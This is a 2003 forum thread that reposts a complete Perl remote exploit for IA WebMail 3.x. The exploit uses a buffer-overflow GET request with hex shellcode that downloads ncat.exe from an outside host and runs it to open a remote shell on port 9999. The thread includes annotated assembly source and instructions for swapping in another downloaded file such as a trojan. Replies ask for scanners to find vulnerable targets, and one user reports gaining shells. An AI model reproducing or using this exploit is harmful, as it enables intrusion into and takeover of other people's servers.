Ia Webmail 3.x (iaregdll.dll Version 1.0.0.5) Remo

-=[MePhIsTo]=-

Nov 19 2003, 04:54 PM

CODE

#!/usr/bin/perl -w
#
# IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
#
# By Peter Winter-Smith peter4020 hotmail.com
# Shellcode included - will need reassembling to use different
# urls and files etc.
#
# Tested against:
# - Windows XP Home SP1
# - Windows 2000 Pro SP4
#
# Shellcode should work each time, since it steals it's addresses
# from the iaregdll.dll module import tables.
# Uses a very static jmp esp in iaregdll.dll - Should work on all
# servers without alteration!
#
# If the remote server is running a firewall, the urldownloader
# will be unable to spawn a shell, so for testing I recommend
# that you close the firewalls, or get another shellcode which
# will deal with this. This exploit is for PoC purposes only :o)
#
# Notes:
# - WebMailsvr.exe exits without consuming 100% resources in most
# cases.
# - This has only been tested with IA WebMail 3.1, however it was
# designed to exploit all versions.

use IO::Socket;

if(!($ARGV[1]))
{
print "Usage: iawebmail.pl <victim> <port>\n\n";
exit;
}

$shellcode = "\x90\xEB\x3C\x5F\x55\x89\xE5\x81" .
"\xC4\xE8\xFF\xFF\xFF\x57\x31\xDB" .
"\xB3\x07\xB0\xFF\xFC\xF2\xAE\xFE" .
"\x47\xFF\xFE\xCB\x80\xFB\x01\x75" .
"\xF4\x5F\x57\x8D\x7F\x0B\x57\x8D" .
"\x7F\x13\x57\x8D\x7F\x08\x57\x8D" .
"\x7F\x23\x57\x8D\x7F\x09\x47\x57" .
"\x8D\x54\x24\x14\x52\xEB\x02\xEB" .
"\x52\x89\xD6\xFF\x36\xFF\x15\xDC" .
"\x51\x02\x10\x5A\x52\x8D\x72\xFC" .
"\xFF\x36\x50\xFF\x15\x14\x52\x02" .
"\x10\x5A\x52\x31\xC9\x51\x51\x8D" .
"\x72\xF0\xFF\x36\x8D\x72\xF4\xFF" .
"\x36\x51\xFF\xD0\x5A\x52\xFF\x72" .
"\xEC\xFF\x15\xDC\x51\x02\x10\x5A" .
"\x52\x8D\x72\xF8\xFF\x36\x50\xFF" .
"\x15\x14\x52\x02\x10\x5A\x52\x31" .
"\xC9\x41\x51\x8D\x72\xF0\xFF\x36" .
"\xFF\xD0\xCC\xE8\x6B\xFF\xFF\xFF" .
"\x55\x52\x4C\x4D\x4F\x4E\x2E\x44" .
"\x4C\x4C\xFF\x55\x52\x4C\x44\x6F" .
"\x77\x6E\x6C\x6F\x61\x64\x54\x6F" .
"\x46\x69\x6C\x65\x41\xFF\x57\x69" .
"\x6E\x45\x78\x65\x63\xFF\x68\x74" .
"\x74\x70\x3A\x2F\x2F\x77\x77\x77" .
"\x2E\x65\x6C\x69\x74\x65\x68\x61" .
"\x76\x65\x6E\x2E\x6E\x65\x74\x2F" .
"\x6E\x63\x61\x74\x2E\x65\x78\x65" .
"\xFF\x63\x3A\x5C\x6E\x63\x2E\x65" .
"\x78\x65\xFF\x6B\x65\x72\x6E\x65" .
"\x6C\x33\x32\x2E\x64\x6C\x6C\xFF";

$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Unable to connect to $ARGV[0] on port $ARGV[1]";
$ebp = "BBBB";
$eip = "\x33\xBD\x02\x10";
$exploit = "GET /" . "a"x1036 . $ebp . $eip . $shellcode . " HTTP/1.1\n\n";

print $victim $exploit;

print " + Malicious GET request sent ...\n";
print " + Wait a moment now, then connect to $ARGV[0] on port 9999.\n";
print "Done.\n";

close($victim);
exit;

#####################################################################
## SHELLCODE #
#####################################################################
#; IA WebMail 3.x Shellcode (iaregdll.dll version 1.0.0.5)
#; Url Download + Execute
#; By Peter Winter-Smith
#; [peter4020@hotmail.com]
#;
#; nasmw -fbin -o iashellcode.s iashellcode.asm
#
# bits 32
#
# int3
# jmp short killnull
#
# next:
# pop edi
#
# push ebp
# mov ebp, esp
# add esp, -24
#
# push edi
#
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
#
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
#
# pop edi
#
# push edi ; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi ; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi ; 'WinExec'
# lea edi, [edi+08]
# push edi ; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi ; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi ; 'kernel32.dll'
#
# lea edx, [esp+20]
# push edx
#
# jmp short over
# killnull:
# jmp short data
# over:
#
# mov esi, edx
# push dword [esi]
#
# call [100251DCh]; LoadLibraryA
#
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
#
# push eax
#
# call [10025214h]; GetProcAddress(URLMON.DLL, URLDownloadToFileA);
#
# pop edx
# push edx
#
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16]; file path
# push dword [esi]
# lea esi, [edx-12]; url
# push dword [esi]
# push ecx
#
# call eax
#
# pop edx
# push edx
#
# push dword [edx-20]
#
# call [100251DCh]; LoadLibraryA
#
# pop edx
# push edx
#
#
# lea esi, [edx-08]
# push dword [esi]; 'WinExec'
# push eax ; kernel32.dll handle
#
# call [10025214h]; GetProcAddress(kernel32.dll, WinExec);
#
# pop edx
# push edx
#
# xor ecx, ecx
# inc ecx
# push ecx
#
# lea esi, [edx-16]; file path
# push dword [esi]
#
# call eax
#
# int3
#
#
# data:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
#; When altering, you MUST be sure
#; to also alter the offsets in the 0ffh to null
#; byte search!
#; for example:
#; db 'http://www.site.com/someguy/trojan.exe',0ffh
#; count the length of the url, and add one for the 0ffh byte.
#; The above url is 38 bytes long, plus one for our null, is 39 bytes.
#; find the code saying (at the start of the shellcode):
#; push edi ; 'http://www.elitehaven.net/ncat.exe'
#; lea edi, [edi+35]
#; and make it:
#; push edi ; 'http://www.site.com/someguy/trojan.exe'
#; lea edi, [edi+39]
#; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
#####################################################################

flame

Nov 19 2003, 05:40 PM

QUOTE

[ Proof of Concept Exploit for IA WebMail 3.x ]

Tested against:
-WinXP Home SP1 (should work for all XP systems)
-Win2K Pro SP4

Downloads and executes the file 'http://www.elitehaven.net/ncat.exe'
which is set to spawn a shell on port 9999 on the target system.

The exploit will only work if the following conditions are true:
-The remote system has internet access which will allow:
- A file to be downloaded from a server on port 80.
- A new process to be started and listen on port 9999.

This exploit will probably fail if the target is running a firewall,
so if you wish to re-write the code for these exceptions please feel
free. You may wish to change the file to be downloaded too - I have
made it obvious where you can do this in the exploit code.

Have fun!

)

-Peter

Toilal

Nov 19 2003, 06:10 PM

Posted: Nov 19 2003, 12:30 PM

Same title, same post, 3 hours later only. great !!

T3cHn0b0y

Nov 19 2003, 08:26 PM

QUOTE (flame @ Nov 19 2003, 05:40 PM)

QUOTE

[ Proof of Concept Exploit for IA WebMail 3.x ]

Tested against:
-WinXP Home SP1 (should work for all XP systems)
-Win2K Pro SP4

Downloads and executes the file 'http://www.elitehaven.net/ncat.exe'
which is set to spawn a shell on port 9999 on the target system.

The exploit will only work if the following conditions are true:
-The remote system has internet access which will allow:
- A file to be downloaded from a server on port 80.
- A new process to be started and listen on port 9999.

This exploit will probably fail if the target is running a firewall,
so if you wish to re-write the code for these exceptions please feel
free. You may wish to change the file to be downloaded too - I have
made it obvious where you can do this in the exploit code.

Have fun!

)

-Peter

Where does it say 'nc.exe -lvvp 9999 -e CMD.EXE'?

I only see 'c:\nc.exe'

antique

Nov 19 2003, 09:30 PM

I need a scanner for this variable anyone have it ?

WeeDMoNKeY

Nov 20 2003, 12:12 AM

T3cHn0b0y uhm, you connect to it cause it downloads netcat, read re read and readonce more, youll get it.. and Toilal flame added a lil more.... ty flame

anyone knwo the cgi line to scan for? thx.

ssj4conejo

Nov 20 2003, 07:02 AM

thx alot for the code and the file. Does this run on a certain port? Thankyou.

T3cHn0b0y

Nov 20 2003, 07:27 PM

Ok I didnt know the execution was done inside the hex. Thought it was trying to execute nc.exe on its own.

ivan288

Nov 20 2003, 07:59 PM

nice explot, how do you scan for it tho?

Remulus

Dec 16 2003, 09:05 AM

Nice exploit. It works, I had twice shell.
Is there a good scanner for this ?

Sorry for my English.